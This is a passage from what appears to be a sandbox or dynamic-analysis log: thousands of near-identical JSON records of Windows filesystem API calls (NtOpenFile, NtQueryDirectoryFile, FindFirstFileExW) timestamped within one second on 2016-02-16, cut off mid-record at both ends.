"NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,116", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,116", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,116", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,186", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,186", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,186", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,186", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,186", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,186", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,186", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,186", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,186", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,186", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,236", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,236", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,236", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,236", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,276", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,276", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,276", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,276", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,276", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,276", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,276", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,276", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "FindFirstFileExW"}, {"category": "filesystem", 